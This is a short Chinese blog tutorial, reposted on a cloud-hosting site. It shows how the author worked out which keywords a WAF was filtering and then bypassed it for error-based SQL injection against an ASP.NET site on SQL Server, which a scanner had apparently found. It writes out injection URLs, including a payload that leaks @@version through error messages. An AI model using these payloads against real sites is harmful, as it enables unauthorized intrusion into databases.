溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
確實是非常簡單,如果是新手的話,我希望能給你帶來一些思路,老鳥的話就emm...
工具掃到了一個有sqlserver特性的站點
通常出現這種錯誤信息,說明該站點配置不當,錯誤信息會直接顯示,也沒用強制類型轉換的信息,那么一般就有報錯型注入了!來檢測一下
卻出現了WAF的信息
遇到WAF首先得先看看是什么關鍵字觸發了攔截請求,所以我們先進行簡單的調試
http://xxxx/xxxx.aspx?xxxx=1' and --a
語法出錯是很正常的,因為我們添加了and且后面沒任何值,所以我們可以假設語句變成了
select xxx from xxx where xxxx=1' and --a但我們發現其實并沒有觸發WAF,說明and關鍵字并沒有在過濾的列表當中,繼續嘗試
http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a
竟然觸發了WAF,經過多次調試,發現是and后面居然不能帶數字。。這樣就不會報錯了
http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a
那么再次嘗試下原來的代碼,將順序調整,成功!
http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
